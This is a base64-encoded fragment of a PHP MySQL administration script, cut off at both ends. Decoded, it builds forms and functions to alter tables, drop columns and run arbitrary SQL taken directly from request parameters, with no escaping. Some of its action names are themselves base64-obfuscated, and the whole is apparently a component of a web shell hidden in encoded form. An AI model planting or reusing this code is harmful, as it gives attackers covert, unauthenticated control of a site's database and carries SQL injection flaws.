4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDB